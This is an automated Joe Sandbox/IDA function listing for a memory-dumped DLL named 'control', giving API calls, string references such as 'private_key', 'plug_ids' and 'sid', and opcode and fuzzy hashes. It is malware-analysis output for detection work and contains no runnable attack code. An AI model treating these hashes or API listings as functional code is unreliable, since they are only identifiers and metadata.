Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__amsg_exit__getptd_noexit__invoke_watson_memmove
String ID:
API String ID: 3739364018-0
Opcode ID: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
Instruction ID: ff94cb8106a5d527924046aadc737bfe104d0811a886c723f0991959bc7079a2
Opcode Fuzzy Hash: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
Instruction Fuzzy Hash: 76717E76900656ABDB21DF65CC41BEE77B9EF45350F2204B6FD08E6142EF309E808B99

Function 1001275E Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012763

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_free.LIBCMT ref: 100128EA

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_free.LIBCMT ref: 100128FF

Part of subcall function 10008F9C: _free.LIBCMT ref: 10008FAF

Strings

sid, xrefs: 10012834, 10012847, 10012848
device, xrefs: 100127FC, 1001280F, 10012810
plug_ids, xrefs: 1001286C, 1001287F, 10012880

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free$H_prolog$ErrorFreeHeapLast
String ID: device$plug_ids$sid
API String ID: 134051451-977494499
Opcode ID: 5ea2fee5a0c9fc4f50834f6979097f9df585b9c0cd4635544c2940b687deb193
Instruction ID: 3f0808df7f20e6c0ce64670c10651f41c15fc23708fe5e9afe7c08bb42e6ca24
Opcode Fuzzy Hash: 5ea2fee5a0c9fc4f50834f6979097f9df585b9c0cd4635544c2940b687deb193
Instruction Fuzzy Hash: 4F51A0B5900198EEEB05CB74CC45BEDBBB9FF49340F1041ADE446AB196DB706E88CB60

Function 10007701 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 150COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10007706

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10007883
_free.LIBCMT ref: 10007898

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

Strings

res, xrefs: 10007786, 10007795, 10007796, 100077CF, 100077DE, 100077DF
data, xrefs: 100077BE
msg, xrefs: 10007807, 1000781A, 1000781B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$_free
String ID: data$msg$res
API String ID: 2563830877-3980117613
Opcode ID: 862d76a29c2dec90051991f26c3cc1d67e65dd21bc684fabf0a2797ddb8bb131
Instruction ID: 3fcbf712e36f12b6888734473e68dc3a077dfffe0d576fe19f48313bd6c7c2f3
Opcode Fuzzy Hash: 862d76a29c2dec90051991f26c3cc1d67e65dd21bc684fabf0a2797ddb8bb131
Instruction Fuzzy Hash: 4E51AD74D00199EEEB06DF64CC45BEDBB79FF05384F5080A9E00AA7196DB746E89CB60

Function 10012592 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012597

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_free.LIBCMT ref: 10012707
_free.LIBCMT ref: 1001271C

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Part of subcall function 10008F9C: _free.LIBCMT ref: 10008FAF

Strings

sid, xrefs: 10012668, 1001267B, 1001267C
version, xrefs: 10012689, 10012698, 10012699
device, xrefs: 1001262F, 10012642, 10012643

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free$H_prolog$ErrorFreeHeapLast
String ID: device$sid$version
API String ID: 134051451-1479437089
Opcode ID: 82b5cea9db81fd9ded34504d21c4d6f2b23cc87abe22488c426c86dec813310a
Instruction ID: 0c8dda4f27c5469a62dd08be8a99df0db697d51d5011bfe7e545aed121ea5e8d
Opcode Fuzzy Hash: 82b5cea9db81fd9ded34504d21c4d6f2b23cc87abe22488c426c86dec813310a
Instruction Fuzzy Hash: 93517EB5900258EEEB15DFA4CC45BEEBB79FF45340F1441AEE00AA7196DB706E84CB60

Function 10016228 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100162B8
_memmove.LIBCMT ref: 100162E5
_memmove.LIBCMT ref: 1001631B
_memmove.LIBCMT ref: 10016334
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1001636D

Strings

deque<T> too long, xrefs: 10016372

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID: deque<T> too long
API String ID: 279611364-309773918
Opcode ID: 2a362c45092fa91b740383e07cdc9f783978205ec6e99cd1913ac18cdf3ebdc1
Instruction ID: 784c8dabccd0a6210e0a94bf7cb842966d568d9ccd1820f8fb5e6c9047be17b7
Opcode Fuzzy Hash: 2a362c45092fa91b740383e07cdc9f783978205ec6e99cd1913ac18cdf3ebdc1
Instruction Fuzzy Hash: 7741F776A00A15AFCB14CE69CD8165EB7F5EF44260B11863CEC25EB780DB31FE54C690

Function 10009910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100099A0
_memmove.LIBCMT ref: 100099CD
_memmove.LIBCMT ref: 10009A03
_memmove.LIBCMT ref: 10009A1C
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009A55

Strings

deque<T> too long, xrefs: 10009A5A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID: deque<T> too long
API String ID: 279611364-309773918
Opcode ID: 80f878e772d514ee3649cda1280fdb71b672c2027185422bf1bd75d506dc88d2
Instruction ID: c33eebfb5094b413b489a485585810ec97f9a99f418be5463e29e809b8ca8558
Opcode Fuzzy Hash: 80f878e772d514ee3649cda1280fdb71b672c2027185422bf1bd75d506dc88d2
Instruction Fuzzy Hash: B541E272B00615AFDB14CEA9DD9155EB7F5EF412A0B12863CE829E7684D731FE01CAC0

Function 10009A65 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 10009AF5
_memmove.LIBCMT ref: 10009B22
_memmove.LIBCMT ref: 10009B58
_memmove.LIBCMT ref: 10009B71
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009BAA

Strings

deque<T> too long, xrefs: 10009BAF

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID: deque<T> too long
API String ID: 279611364-309773918
Opcode ID: e2ce87b9cf77c3e13f760d8457cfe9c59b6ca1b33e55e24669dc7f2a1a5012b7
Instruction ID: db1164e802a4458a3ce7583a04cbe5f548d023cd19655491dc9812bad43fda5d
Opcode Fuzzy Hash: e2ce87b9cf77c3e13f760d8457cfe9c59b6ca1b33e55e24669dc7f2a1a5012b7
Instruction Fuzzy Hash: FD41D372A00615AFDB14CE69DD8155EB7E5EF802A0B11863CE829E7684DB31FE05CAD0

Function 10026470 Relevance: 10.6, APIs: 7, Instructions: 126threadnetworkCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10026482
_free.LIBCMT ref: 100264B5

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_malloc.LIBCMT ref: 100264FC
WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,000000FF,00000000), ref: 10026544
WSAGetLastError.WS2_32 ref: 10026580

Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?), ref: 10026961
Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 100269C0
Part of subcall function 10026910: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A19
Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A2B
Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 10026A6A

GetCurrentThreadId.KERNEL32 ref: 100265A3
GetCurrentThreadId.KERNEL32 ref: 100265C7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentThread$EnterErrorFreeHeapLastLeave$EventsMultipleWait_free_malloc
String ID:
API String ID: 1895213536-0
Opcode ID: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
Instruction ID: 0298792182ec29e5365059a5bbda46a15199a9bf932673d6ad35eb89bca77991
Opcode Fuzzy Hash: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
Instruction Fuzzy Hash: 094158B0700B629FD710DF25DC84B6ABBE5FF48394F904629E855C7684EB70E854CB91

Function 10007918 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000791D

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10007A1E
_free.LIBCMT ref: 10007A30

Strings

private_key, xrefs: 100079AB, 100079B8, 100079BE, 100079BF
res, xrefs: 10007953, 10007962, 10007963
uid, xrefs: 10007971, 10007980, 10007981

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_free
String ID: private_key$res$uid
API String ID: 271808718-3738858810
Opcode ID: 4f016080850609360ca2d250ea354d0cf53dd12af1ea2d0b169f73934801bb16
Instruction ID: b6013081ae0201dd2ab21c5d2a27a229817cca7cbcb5dc17cd26a2df307d9ed3
Opcode Fuzzy Hash: 4f016080850609360ca2d250ea354d0cf53dd12af1ea2d0b169f73934801bb16
Instruction Fuzzy Hash: 5341CFB5C00149AEEB06DF64CC45BEEBBB8FF45250F50816AE046A7191DF747E88CB60

Function 10025480 Relevance: 10.6, APIs: 7, Instructions: 109networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,00000100,?), ref: 1002550F
_free.LIBCMT ref: 10025524

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

WSASetLastError.WS2_32(00000000), ref: 10025531
_memmove.LIBCMT ref: 1002557D
freeaddrinfo.WS2_32(?), ref: 1002558B
htons.WS2_32(00000000), ref: 10025599
WSASetLastError.WS2_32(00002AF9), ref: 100255BF

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeHeap_free_memmovefreeaddrinfogetaddrinfohtons
String ID:
API String ID: 189201043-0
Opcode ID: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
Instruction ID: 8b64a374cbdad8b26f637beff122fe858c6ba4784a9924af0ca1a5756791f1ba
Opcode Fuzzy Hash: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
Instruction Fuzzy Hash: F141BF32A047119FC314CF54D885A6BF7F5EFC8251F80861EF84A8A261EB71D944CB82

Function 10019FCE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10019FD3
_localeconv.LIBCMT ref: 10019FE6
__Getcvt.LIBCPMT ref: 10019FF1

Part of subcall function 100325A1: ____lc_codepage_func.LIBCMT ref: 100325B8
Part of subcall function 100325A1: ____mb_cur_max_func.LIBCMT ref: 100325C1
Part of subcall function 100325A1: ____lc_locale_name_func.LIBCMT ref: 100325C9

__Getcvt.LIBCPMT ref: 1001A01E

Strings

false, xrefs: 1001A03B
true, xrefs: 1001A050

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Getcvt$H_prolog____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
String ID: false$true
API String ID: 1717203633-2658103896
Opcode ID: 44d9b82f475df3b7ea79f1ec68712fc431a3278e822bead156ed747d5e2d157e
Instruction ID: 9387084c28b85512576952066f4a55378dc9e19b25225860178136d16139c7ab
Opcode Fuzzy Hash: 44d9b82f475df3b7ea79f1ec68712fc431a3278e822bead156ed747d5e2d157e
Instruction Fuzzy Hash: 9721B0B5C007449ECB22CFA4C84199FBBF8EF5A310F10851FE4469B212D731EA85CBA1

Function 10027260 Relevance: 10.6, APIs: 7, Instructions: 64windowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(75922F30,?,?,?,?,?,?,?,?,?,?,10023517,93656AD3), ref: 1002726C
timeGetTime.WINMM(?,000004FF,00000004,?,?,?,?,?,?,?,?,?,?,10023517,93656AD3), ref: 1002728C
MsgWaitForMultipleObjectsEx.USER32(00000001,?,?,000004FF,00000004), ref: 100272BA
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100272D0
TranslateMessage.USER32(?), ref: 100272E4
DispatchMessageA.USER32(?), ref: 100272EA
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 100272F8

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Message$PeekTimetime$DispatchMultipleObjectsTranslateWait
String ID:
API String ID: 443098685-0
Opcode ID: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
Instruction ID: 079f8dbcd54a8d9c3218eb8dc4e85431248a595f9298e6c6c7ee3261443cfdea
Opcode Fuzzy Hash: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
Instruction Fuzzy Hash: 81118F71A40219ABEB10DBA4DD86FDDB7B8EB08750F204165FA05E72D0E7B1EE448B61

Function 1001136C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

CoCreateGuid.OLE32(?), ref: 1001138D
_fprintf.LIBCMT ref: 100113A5
__snprintf.LIBCMT ref: 100113F3

Strings

guid: %s, xrefs: 100113FC
create guid error, xrefs: 10011397
%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 100113EB

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CreateGuid__snprintf_fprintf
String ID: %08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$create guid error$guid: %s
API String ID: 2959897907-549114592
Opcode ID: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
Instruction ID: 34a024b1c78299da0623422e875facfe61a2b6fae81b3d97e7196060f838763d
Opcode Fuzzy Hash: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
Instruction Fuzzy Hash: 89118CA6C041997EDB51D7E58C12EFFBBFC9B09602F044042FA94E9082E638E745DB70

Function 10026BA0 Relevance: 10.6, APIs: 7, Instructions: 55synchronizationthreadnetworkCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10026BA4
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 10026BCC
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 10026BD7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 10026BE0
WSACloseEvent.WS2_32(1001F33E), ref: 10026C12
shutdown.WS2_32(93656AD3,00000001), ref: 10026C2A
closesocket.WS2_32(93656AD3), ref: 10026C33

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseEvent$CurrentHandleObjectSingleThreadWaitclosesocketshutdown
String ID:
API String ID: 701127830-0
Opcode ID: 8cad8b222ed106d079ed3702084d24a92cf9dbfcd69efa12e1806d29ca05c049
Instruction ID: 2f1dc53aaf80abfc29e8aaefbb56988622e6ee1a66fd8a3bf2256b625d579e69
Opcode Fuzzy Hash: 8cad8b222ed106d079ed3702084d24a92cf9dbfcd69efa12e1806d29ca05c049
Instruction Fuzzy Hash: E6111C34200B109BDB619F25DE88B5ABBF5FF48721F504A1DF49382AB1CB75A885CB50

Function 10036993 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 100369AC
